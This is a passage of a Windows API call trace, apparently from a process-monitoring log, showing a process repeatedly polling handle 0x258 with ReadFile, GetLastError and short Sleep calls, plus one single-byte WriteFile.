	[0192.194] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.194] GetLastError () returned 0x218
	[0192.194] Sleep (dwMilliseconds=0xa) 
	[0192.209] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.209] GetLastError () returned 0x218
	[0192.209] Sleep (dwMilliseconds=0xa) 
	[0192.224] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.224] GetLastError () returned 0x218
	[0192.224] Sleep (dwMilliseconds=0xa) 
	[0192.240] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.240] GetLastError () returned 0x218
	[0192.240] Sleep (dwMilliseconds=0xa) 
	[0192.256] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.256] GetLastError () returned 0x218
	[0192.256] Sleep (dwMilliseconds=0xa) 
	[0192.271] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.271] GetLastError () returned 0x218
	[0192.271] Sleep (dwMilliseconds=0xa) 
	[0192.287] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.287] GetLastError () returned 0x218
	[0192.287] Sleep (dwMilliseconds=0xa) 
	[0192.302] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.302] GetLastError () returned 0x218
	[0192.302] Sleep (dwMilliseconds=0xa) 
	[0192.317] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.317] GetLastError () returned 0x218
	[0192.317] Sleep (dwMilliseconds=0xa) 
	[0192.333] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.333] GetLastError () returned 0x218
	[0192.333] Sleep (dwMilliseconds=0xa) 
	[0192.349] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.349] GetLastError () returned 0x218
	[0192.349] Sleep (dwMilliseconds=0xa) 
	[0192.365] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.365] GetLastError () returned 0x218
	[0192.365] Sleep (dwMilliseconds=0xa) 
	[0192.380] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.380] GetLastError () returned 0x218
	[0192.380] Sleep (dwMilliseconds=0xa) 
	[0192.395] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.395] GetLastError () returned 0x218
	[0192.395] Sleep (dwMilliseconds=0xa) 
	[0192.411] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.411] GetLastError () returned 0x218
	[0192.411] Sleep (dwMilliseconds=0xa) 
	[0192.427] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.427] GetLastError () returned 0x218
	[0192.427] Sleep (dwMilliseconds=0xa) 
	[0192.442] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.442] GetLastError () returned 0x218
	[0192.442] Sleep (dwMilliseconds=0xa) 
	[0192.458] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.458] GetLastError () returned 0x218
	[0192.458] Sleep (dwMilliseconds=0xa) 
	[0192.525] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.525] GetLastError () returned 0x218
	[0192.525] Sleep (dwMilliseconds=0xa) 
	[0192.567] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.567] GetLastError () returned 0x218
	[0192.567] Sleep (dwMilliseconds=0xa) 
	[0192.614] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.614] GetLastError () returned 0x218
	[0192.614] Sleep (dwMilliseconds=0xa) 
	[0192.661] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.661] GetLastError () returned 0x218
	[0192.661] Sleep (dwMilliseconds=0xa) 
	[0192.707] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0192.708] GetLastError () returned 0x218
	[0192.708] Sleep (dwMilliseconds=0xa) 
	[0193.297] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0193.297] GetLastError () returned 0x218
	[0193.297] Sleep (dwMilliseconds=0xa) 
	[0193.784] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0193.784] GetLastError () returned 0x218
	[0193.784] Sleep (dwMilliseconds=0xa) 
	[0193.909] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0193.909] GetLastError () returned 0x218
	[0193.909] Sleep (dwMilliseconds=0xa) 
	[0193.956] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0193.956] GetLastError () returned 0x218
	[0193.956] Sleep (dwMilliseconds=0xa) 
	[0194.019] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.019] GetLastError () returned 0x218
	[0194.019] Sleep (dwMilliseconds=0xa) 
	[0194.065] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.065] GetLastError () returned 0x218
	[0194.065] Sleep (dwMilliseconds=0xa) 
	[0194.083] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.083] GetLastError () returned 0x218
	[0194.083] Sleep (dwMilliseconds=0xa) 
	[0194.104] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.104] GetLastError () returned 0x218
	[0194.104] Sleep (dwMilliseconds=0xa) 
	[0194.111] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.111] GetLastError () returned 0x218
	[0194.111] Sleep (dwMilliseconds=0xa) 
	[0194.127] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.127] GetLastError () returned 0x218
	[0194.127] Sleep (dwMilliseconds=0xa) 
	[0194.143] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.143] GetLastError () returned 0x218
	[0194.143] Sleep (dwMilliseconds=0xa) 
	[0194.158] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.158] GetLastError () returned 0x218
	[0194.158] Sleep (dwMilliseconds=0xa) 
	[0194.174] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.174] GetLastError () returned 0x218
	[0194.174] Sleep (dwMilliseconds=0xa) 
	[0194.189] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.189] GetLastError () returned 0x218
	[0194.189] Sleep (dwMilliseconds=0xa) 
	[0194.237] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.237] GetLastError () returned 0x218
	[0194.237] Sleep (dwMilliseconds=0xa) 
	[0194.299] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.299] GetLastError () returned 0x218
	[0194.299] Sleep (dwMilliseconds=0xa) 
	[0194.323] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.323] GetLastError () returned 0x218
	[0194.323] Sleep (dwMilliseconds=0xa) 
	[0194.330] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.330] GetLastError () returned 0x218
	[0194.330] Sleep (dwMilliseconds=0xa) 
	[0194.345] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.345] GetLastError () returned 0x218
	[0194.346] Sleep (dwMilliseconds=0xa) 
	[0194.361] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.361] GetLastError () returned 0x218
	[0194.361] Sleep (dwMilliseconds=0xa) 
	[0194.378] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.378] GetLastError () returned 0x218
	[0194.378] Sleep (dwMilliseconds=0xa) 
	[0194.392] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.392] GetLastError () returned 0x218
	[0194.392] Sleep (dwMilliseconds=0xa) 
	[0194.408] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.408] GetLastError () returned 0x218
	[0194.408] Sleep (dwMilliseconds=0xa) 
	[0194.424] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.424] GetLastError () returned 0x218
	[0194.424] Sleep (dwMilliseconds=0xa) 
	[0194.470] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.470] GetLastError () returned 0x218
	[0194.470] Sleep (dwMilliseconds=0xa) 
	[0194.525] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.525] GetLastError () returned 0x218
	[0194.525] Sleep (dwMilliseconds=0xa) 
	[0194.535] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.535] GetLastError () returned 0x218
	[0194.535] Sleep (dwMilliseconds=0xa) 
	[0194.548] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.548] GetLastError () returned 0x218
	[0194.548] Sleep (dwMilliseconds=0xa) 
	[0194.567] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.567] GetLastError () returned 0x218
	[0194.567] Sleep (dwMilliseconds=0xa) 
	[0194.580] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.580] GetLastError () returned 0x218
	[0194.580] Sleep (dwMilliseconds=0xa) 
	[0194.596] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.596] GetLastError () returned 0x218
	[0194.596] Sleep (dwMilliseconds=0xa) 
	[0194.611] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.611] GetLastError () returned 0x218
	[0194.611] Sleep (dwMilliseconds=0xa) 
	[0194.631] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.631] GetLastError () returned 0x218
	[0194.631] Sleep (dwMilliseconds=0xa) 
	[0194.642] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.642] GetLastError () returned 0x218
	[0194.642] Sleep (dwMilliseconds=0xa) 
	[0194.689] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.689] GetLastError () returned 0x218
	[0194.689] Sleep (dwMilliseconds=0xa) 
	[0194.729] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0194.729] GetLastError () returned 0x218
	[0194.729] Sleep (dwMilliseconds=0x3e8) 
	[0195.777] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0195.777] Sleep (dwMilliseconds=0xa) 
	[0195.848] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0195.848] GetLastError () returned 0x218
	[0195.848] Sleep (dwMilliseconds=0xa) 
	[0195.897] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0195.897] GetLastError () returned 0x218
	[0195.897] Sleep (dwMilliseconds=0xa) 
	[0195.921] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0195.921] GetLastError () returned 0x218
	[0195.921] Sleep (dwMilliseconds=0xa) 
	[0195.963] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0195.963] GetLastError () returned 0x218
	[0195.963] Sleep (dwMilliseconds=0xa) 
	[0195.976] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0195.976] GetLastError () returned 0x218
	[0195.976] Sleep (dwMilliseconds=0xa) 
	[0195.999] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0195.999] GetLastError () returned 0x218
	[0195.999] Sleep (dwMilliseconds=0xa) 
	[0196.051] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.051] GetLastError () returned 0x218
	[0196.051] Sleep (dwMilliseconds=0xa) 
	[0196.135] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.135] GetLastError () returned 0x218
	[0196.135] Sleep (dwMilliseconds=0xa) 
	[0196.176] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.176] GetLastError () returned 0x218
	[0196.176] Sleep (dwMilliseconds=0xa) 
	[0196.195] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.195] GetLastError () returned 0x218
	[0196.195] Sleep (dwMilliseconds=0xa) 
	[0196.209] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.209] GetLastError () returned 0x218
	[0196.209] Sleep (dwMilliseconds=0xa) 
	[0196.233] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.233] GetLastError () returned 0x218
	[0196.233] Sleep (dwMilliseconds=0xa) 
	[0196.268] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.268] GetLastError () returned 0x218
	[0196.268] Sleep (dwMilliseconds=0xa) 
	[0196.326] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.326] GetLastError () returned 0x218
	[0196.326] Sleep (dwMilliseconds=0xa) 
	[0196.420] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.420] GetLastError () returned 0x218
	[0196.420] Sleep (dwMilliseconds=0xa) 
	[0196.446] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0196.446] GetLastError () returned 0x218
	[0196.446] Sleep (dwMilliseconds=0xa) 
